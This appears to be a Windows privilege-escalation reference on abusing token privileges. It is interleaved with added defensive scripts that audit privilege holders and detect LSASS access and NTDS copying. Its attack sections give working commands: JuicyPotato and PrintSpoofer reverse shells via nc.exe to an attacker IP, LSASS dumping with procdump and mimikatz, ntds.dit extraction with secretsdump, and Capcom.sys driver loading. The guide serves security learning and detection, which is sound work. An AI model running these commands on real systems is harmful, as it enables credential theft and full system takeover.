Excessive User Rights Abuse
User privileges can be assigned to an account but disabled in its token. Some of them can be re-enabled using scripts or commands, depending on the privilege.

These privileges can be used to trick a process running as SYSTEM into connecting to the exploit process, handing over its token to be used. In other words, whenever a user has one of these privileges, it is possible to get privilege escalation by impersonating NT AUTHORITY\SYSTEM.
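The first thing a reviewer or responder wants from a host is the list of token privileges an account actually holds, including the ones that are assigned but currently disabled, since the paragraph above notes that a disabled privilege can simply be re-enabled. The script below is an added example written for this page (it is not from JuicyPotato, PrintSpoofer or any other tool mentioned here): it parses the text output of `whoami /priv` and reports every privilege discussed on this page regardless of its state. The sample output and the `HIGH_RISK_PRIVILEGES` set are assumptions of the example; SeImpersonatePrivilege and SeAssignPrimaryTokenPrivilege are included because they are the documented prerequisites of the potato family of tools.

```python
"""Parse `whoami /priv` output and flag escalation-capable token privileges,
whether or not they are currently enabled.
Added example for this page; not from any tool the page describes."""

# Privileges discussed on this page. Holding any of them makes an account
# effectively administrator-equivalent. Assumption of this example, not an
# exhaustive list.
HIGH_RISK_PRIVILEGES = {
    "SeImpersonatePrivilege",
    "SeAssignPrimaryTokenPrivilege",
    "SeDebugPrivilege",
    "SeTakeOwnershipPrivilege",
    "SeBackupPrivilege",
    "SeRestorePrivilege",
    "SeLoadDriverPrivilege",
    "SeSecurityPrivilege",
}

# Constructed sample of `whoami /priv` for a low-privilege service account;
# real output uses the same column layout.
SAMPLE_WHOAMI_PRIV = """
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeBackupPrivilege             Back up files and directories             Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""


def parse_whoami_priv(text: str) -> dict:
    """Return {privilege_name: state} from `whoami /priv` output.

    Table rows start after the '====' separator line; the privilege name is
    the first whitespace-delimited token and the state is the last one.
    """
    privileges = {}
    in_table = False
    for line in text.splitlines():
        if line.startswith("===="):
            in_table = True
            continue
        if not in_table or not line.strip():
            continue
        parts = line.split()
        privileges[parts[0]] = parts[-1]
    return privileges


def high_risk_privileges(text: str) -> list:
    """List (name, state) for every held high-risk privilege, sorted by name.

    Disabled entries are deliberately included: the token still holds the
    privilege, so the finding is the same as for an enabled one.
    """
    held = parse_whoami_priv(text)
    return sorted((name, state) for name, state in held.items()
                  if name in HIGH_RISK_PRIVILEGES)


if __name__ == "__main__":
    for name, state in high_risk_privileges(SAMPLE_WHOAMI_PRIV):
        print(f"{name:<32} {state}")
```

Feed it the saved output of `whoami /priv` from the account under review; the design choice worth noting is that the check keys on presence, not on the State column, because the State column only says whether the process has enabled the privilege so far.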
JuicyPotato PoC:

1. Download juicypotato and nc.exe on the target machine.
2. Check CLSIDs:
   - Use systeminfo to get the OS version.
   - Select the right CLSID list according to the OS version.
   - Download the test_clsid.bat file.
   - Run test_clsid.bat, wait, then check the result.log file. Inside that log file you will find different CLSIDs; look for a CLSID with SYSTEM privileges.
3. Start a netcat listener on the attacker machine: nc -lvnp 4444
4. Run JuicyPotato:
.\juicypotato.exe -l SAMEPORT -c CLSID_SYSTEM_FROM_RESULTS -p c:\windows\system32\cmd.exe -a "/c c:\users\public\desktop\nc.exe -e cmd.exe attacker-ip SAME-LISTENING-PORT" -t *

Disclaimer/Troubleshooting: the listening netcat port and the port specified after the -l flag need to be the same in order to get the reverse shell.
JuicyPotato doesn't work on Windows Server 2019 and Windows 10 build 1809 onwards. PrintSpoofer and RoguePotato can be used on them to leverage the same privileges and gain NT AUTHORITY\SYSTEM level access.

PrintSpoofer can spawn a SYSTEM process in the current console, spawn a SYSTEM process on a desktop (if logged on locally or via RDP), or catch a reverse shell.

PoC to get a reverse shell:

1. Download PrintSpoofer.exe and nc.exe on the target machine.
2. Start a netcat listener on the attacker machine: nc -lvnp 4444
3. Run PrintSpoofer: PrintSpoofer.exe -c "c:\tools\nc.exe attacker-ip netcat-port -e cmd"
SeDebugPrivilege determines which users can attach to or open any process, even a process they do not own. Developers who are debugging their own applications DO NOT need this user right; developers who are debugging new system components do. This user right provides access to sensitive and critical operating system components: it can be used to capture sensitive information from system memory, or to access and modify kernel and application structures.

Sometimes developer users are assigned SeDebugPrivilege directly rather than being added to the Administrators group, which has this privilege by default.

Dump LSASS and extract credentials:

1. Use ProcDump to extract a dump of the LSASS process:
procdump.exe -accepteula -ma lsass.exe lsass.dmp
2. Load the dump in mimikatz.exe and read the logon passwords:
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords
3. Gain the NTLM hashes to use for a Pass-the-Hash attack or to crack them.

Spawn a process as SYSTEM from a privileged parent (psgetsys.ps1):

1. Open an elevated PowerShell console (e.g. right-click on PowerShell and run as administrator).
2. Run tasklist, look for a privileged process (e.g. winlogon.exe) and note its PID.
3. Run the script:
.\psgetsys.ps1; [MyProcess]::CreateProcessFromParent(<system_pid>,<command_to_execute>,"")
Alternatively:
Import-Module .\psgetsys.ps1
ImpersonateFromParentPid -ppid (Get-Process "lsass").Id -command "C:\tools\revshell.exe"
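The LSASS dump above is the activity a defender most wants to catch when SeDebugPrivilege is handed to non-administrators. The rule below is an added example for this page (not a vendor rule and not from ProcDump or mimikatz): it runs over Sysmon Event ID 10 (ProcessAccess) records, which carry `SourceImage`, `TargetImage` and `GrantedAccess`, and flags any handle to lsass.exe that includes PROCESS_VM_READ from an image outside an allow-list. The records, the allow-list and the chosen masks are constructed for the example; 0x1FFFFF is PROCESS_ALL_ACCESS and 0x1010 is QUERY_INFORMATION plus VM_READ, both commonly seen in credential-dumping telemetry.

```python
"""Flag handle opens on lsass.exe that include memory-read rights in
Sysmon Event ID 10 (ProcessAccess) records.
Added example for this page; records and allow-list are constructed."""

# Access-right bits from the Windows PROCESS_* constants.
PROCESS_VM_READ = 0x0010
PROCESS_QUERY_INFORMATION = 0x0400
PROCESS_ALL_ACCESS = 0x1FFFFF

# Images that legitimately open LSASS with read access on this host.
# Assumption of the example; tune per environment.
ALLOWED_SOURCE_IMAGES = {
    r"C:\Windows\System32\csrss.exe",
    r"C:\Windows\System32\wininit.exe",
    r"C:\Program Files\Windows Defender\MsMpEng.exe",
}

# Constructed Sysmon Event ID 10 records, reduced to the fields the rule uses.
SAMPLE_EVENTS = [
    {"SourceImage": r"C:\Program Files\Windows Defender\MsMpEng.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe",
     "GrantedAccess": "0x1410"},
    {"SourceImage": r"C:\Tools\procdump.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe",
     "GrantedAccess": "0x1FFFFF"},
    {"SourceImage": r"C:\Users\devuser\Desktop\m.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe",
     "GrantedAccess": "0x1010"},
    {"SourceImage": r"C:\Tools\procdump.exe",
     "TargetImage": r"C:\Windows\System32\notepad.exe",
     "GrantedAccess": "0x1FFFFF"},
]


def is_lsass(image_path: str) -> bool:
    """True when the target image is lsass.exe (case-insensitive)."""
    return image_path.lower().endswith("\\lsass.exe")


def reads_memory(granted_access: str) -> bool:
    """True when the granted mask includes PROCESS_VM_READ.

    PROCESS_ALL_ACCESS sets every low bit, so it is covered by the same test.
    """
    mask = int(granted_access, 16)
    return (mask & PROCESS_VM_READ) != 0


def suspicious_lsass_access(events: list) -> list:
    """Return (SourceImage, GrantedAccess) for non-allow-listed readers of LSASS."""
    hits = []
    for event in events:
        if not is_lsass(event["TargetImage"]):
            continue
        if event["SourceImage"] in ALLOWED_SOURCE_IMAGES:
            continue
        if not reads_memory(event["GrantedAccess"]):
            continue
        hits.append((event["SourceImage"], event["GrantedAccess"]))
    return hits


if __name__ == "__main__":
    for source, access in suspicious_lsass_access(SAMPLE_EVENTS):
        print(f"ALERT lsass.exe opened with {access} by {source}")
```

The allow-list is keyed on the full image path rather than the file name so that a copy of a legitimate binary dropped in a user directory does not inherit the exception; pair this with the SeDebugPrivilege assignment audit, since the rule only matters for accounts that can open LSASS at all.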
SeTakeOwnershipPrivilege is a policy setting that determines which users can take ownership of any securable object.

Check the target file's current ownership:
PowerShell: Get-ChildItem -Path 'C:\Path\to\file.txt' | Select FullName,LastWriteTime,Attributes,@{Name="Owner";Expression={ (Get-Acl $_.FullName).Owner }}
CMD: cmd /c dir /q "C:\Path\to\file.txt"
Disclaimer: sometimes the owner won't show due to lack of permissions.

To take ownership of a file: takeown /f 'C:\Path\to\file.txt'
To grant yourself full permissions on the file: icacls 'C:\Path\to\file.txt' /grant htb-student:F
A user with SeBackupPrivilege enabled can bypass file and directory, registry, and other persistent object permissions for the purposes of backing up the system. This lets us copy a file from a folder, bypassing any access control list (ACL). However, we can't do this using the standard copy command. Instead, the data has to be copied programmatically, making sure to specify the FILE_FLAG_BACKUP_SEMANTICS flag. We can use the built-in robocopy tool or the following PoC to copy any file: https://github.com/giuliano108/SeBackupPrivilege

Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll
If the privilege is assigned but disabled, use Set-SeBackupPrivilege and verify with Get-SeBackupPrivilege.
Copy a file: Copy-FileSeBackupPrivilege 'C:\Confidential\2021 Contract.txt' .\Contract.txt

Robocopy is a built-in utility that can copy files in backup mode, so no external tools are required:
robocopy /B E:\Windows\NTDS .\ntds ntds.dit
The NTDS.dit file is locked by default. We can use the Windows diskshadow utility to create a shadow copy of the C drive and expose it as the E drive; the NTDS.dit in this shadow copy won't be in use by the system. Then we can use the Copy-FileSeBackupPrivilege cmdlet to bypass the ACL and copy the NTDS.dit locally.

Follow these steps:

1. Import-Module .\SeBackupPrivilegeUtils.dll
2. Import-Module .\SeBackupPrivilegeCmdLets.dll
3. If the privilege is assigned but disabled, use Set-SeBackupPrivilege and verify with Get-SeBackupPrivilege.
4. Copy the NTDS file: Copy-FileSeBackupPrivilege E:\Windows\NTDS\ntds.dit C:\Tools\ntds.dit
5. Extract hashes using SecretsDump: secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL
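Every step of the NTDS procedure above leaves a process-creation trail: a backup-mode robocopy, a diskshadow run, a command line naming ntds.dit, or the SeBackupPrivilege cmdlets. The script below is an added example for this page (not from the SeBackupPrivilege project or from any SIEM vendor) that scans Windows Security event 4688 records for those indicators; the records, user names and regexes are constructed for the example. It assumes the "Include command line in process creation events" policy is enabled, because without it event 4688 carries no command line.

```python
"""Scan Windows Security event 4688 (process creation) records for command
lines associated with SeBackupPrivilege abuse.
Added example for this page; records and indicator list are constructed."""

import re

# (label, regex over the lower-cased command line). Assumption of the example.
BACKUP_ABUSE_INDICATORS = [
    ("robocopy backup mode", re.compile(r"\brobocopy\b.*\s/b\b")),
    ("diskshadow invoked", re.compile(r"\bdiskshadow(\.exe)?\b")),
    ("ntds.dit referenced", re.compile(r"\bntds\.dit\b")),
    ("SeBackupPrivilege cmdlet", re.compile(r"(copy-file|set-)sebackupprivilege")),
]

# Constructed 4688 records, reduced to the fields the rule uses.
SAMPLE_4688_EVENTS = [
    {"SubjectUserName": "svc_backup",
     "NewProcessName": r"C:\Windows\System32\Robocopy.exe",
     "CommandLine": r"robocopy /B E:\Windows\NTDS .\ntds ntds.dit"},
    {"SubjectUserName": "devuser",
     "NewProcessName": r"C:\Windows\System32\Robocopy.exe",
     "CommandLine": r"robocopy C:\Data D:\Backup /E /R:1"},
    {"SubjectUserName": "svc_backup",
     "NewProcessName": r"C:\Windows\System32\diskshadow.exe",
     "CommandLine": r"diskshadow.exe /s C:\Tools\shadow.txt"},
    {"SubjectUserName": "svc_backup",
     "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -c Copy-FileSeBackupPrivilege E:\Windows\NTDS\ntds.dit C:\Tools\ntds.dit"},
]


def matching_indicators(command_line: str) -> list:
    """Return the labels of every indicator that matches the command line."""
    lowered = command_line.lower()
    return [label for label, pattern in BACKUP_ABUSE_INDICATORS
            if pattern.search(lowered)]


def detect_backup_abuse(events: list) -> list:
    """Return (user, [labels]) for each record that matches at least one indicator."""
    findings = []
    for event in events:
        labels = matching_indicators(event.get("CommandLine", ""))
        if labels:
            findings.append((event["SubjectUserName"], labels))
    return findings


if __name__ == "__main__":
    for user, labels in detect_backup_abuse(SAMPLE_4688_EVENTS):
        print(f"ALERT {user}: {', '.join(labels)}")
```

A plain `robocopy /E` is deliberately not flagged: the `/B` switch is what requires the privilege, so matching on it keeps ordinary file copies out of the alert queue.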
This policy setting determines which users can dynamically load and unload device drivers. This user right is not required if a signed driver for the new hardware already exists in the driver.cab file on the device. Device drivers run as highly privileged code.

Example - Capcom.sys
A driver typically vulnerable to this attack is Capcom.sys, which can allow any user to execute shellcode with SYSTEM privileges.
PoC usage: EoPLoadDriver.exe RegistryServicePath DriverImagePath
PoC usage with Capcom.sys: EoPLoadDriver.exe System\CurrentControlSet\Capcom c:\path-to-downloaded\Capcom.sys
This policy setting determines which users can specify object access audit options for individual resources such as files, Active Directory objects, and registry keys. These objects specify their system access control lists (SACL). A user assigned this user right can also view and clear the Security log in Event Viewer.

This security setting determines which users can bypass file, directory, registry, and other persistent object permissions when they restore backed-up files and directories. It also determines which users can set valid security principals as the owner of an object.
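Every right described on this page is granted through the same local policy, and the cleanest way to find out who holds them is to export it with `secedit /export /cfg <file>` and compare the `[Privilege Rights]` section against a baseline. The script below is an added example for this page (not Microsoft tooling) that does exactly that; the export text, the constructed domain SID, the `CORP\devuser` entry and the `EXPECTED_HOLDERS` baseline are all assumptions of the example, and the baseline should be adjusted to local policy before use.

```python
"""Audit holders of the user rights discussed on this page from a
`secedit /export /cfg <file>` policy export.
Added example for this page; the export and baseline are constructed."""

import configparser

# Well-known SIDs as they appear in a secedit export (leading '*').
ADMINISTRATORS = "*S-1-5-32-544"     # BUILTIN\Administrators
BACKUP_OPERATORS = "*S-1-5-32-551"   # BUILTIN\Backup Operators
SERVICE = "*S-1-5-6"                 # NT AUTHORITY\SERVICE
LOCAL_SERVICE = "*S-1-5-19"
NETWORK_SERVICE = "*S-1-5-20"

# Principals a hardened baseline permits for each right. Assumption of the
# example; anything beyond this set is reported.
EXPECTED_HOLDERS = {
    "SeDebugPrivilege": {ADMINISTRATORS},
    "SeBackupPrivilege": {ADMINISTRATORS, BACKUP_OPERATORS},
    "SeRestorePrivilege": {ADMINISTRATORS, BACKUP_OPERATORS},
    "SeTakeOwnershipPrivilege": {ADMINISTRATORS},
    "SeLoadDriverPrivilege": {ADMINISTRATORS},
    "SeSecurityPrivilege": {ADMINISTRATORS},
    "SeImpersonatePrivilege": {ADMINISTRATORS, SERVICE, LOCAL_SERVICE, NETWORK_SERVICE},
    "SeAssignPrimaryTokenPrivilege": {LOCAL_SERVICE, NETWORK_SERVICE},
}

# Constructed secedit export. The domain SID is a placeholder and CORP\devuser
# is a made-up account; templates may list principals as names or as *SIDs.
SAMPLE_EXPORT = r"""[Unicode]
Unicode=yes
[Privilege Rights]
SeDebugPrivilege = *S-1-5-32-544,*S-1-5-21-1111111111-2222222222-3333333333-1105
SeBackupPrivilege = *S-1-5-32-544,*S-1-5-32-551
SeLoadDriverPrivilege = *S-1-5-32-544,CORP\devuser
SeImpersonatePrivilege = *S-1-5-32-544,*S-1-5-6,*S-1-5-19,*S-1-5-20
SeTakeOwnershipPrivilege = *S-1-5-32-544
[Version]
signature="$CHICAGO$"
Revision=1
"""


def parse_privilege_rights(export_text: str) -> dict:
    """Return {privilege_name: set(principals)} from the [Privilege Rights] section."""
    cfg = configparser.ConfigParser(interpolation=None, delimiters=("=",))
    cfg.optionxform = str  # keep privilege names in their original case
    cfg.read_string(export_text)
    rights = {}
    for name, value in cfg["Privilege Rights"].items():
        rights[name] = {p.strip() for p in value.split(",") if p.strip()}
    return rights


def unexpected_holders(export_text: str) -> dict:
    """Return {privilege_name: [principals not in the baseline]} for rights that deviate."""
    rights = parse_privilege_rights(export_text)
    findings = {}
    for privilege, expected in EXPECTED_HOLDERS.items():
        extra = rights.get(privilege, set()) - expected
        if extra:
            findings[privilege] = sorted(extra)
    return findings


if __name__ == "__main__":
    for privilege, holders in unexpected_holders(SAMPLE_EXPORT).items():
        print(f"{privilege}: unexpected holders {', '.join(holders)}")
```

A real export is written as UTF-16, so read the file with `open(path, encoding="utf-16")` before passing its contents in. Rights that are absent from the export simply have no holders and produce no finding, which is the desired state for SeDebugPrivilege on most member servers.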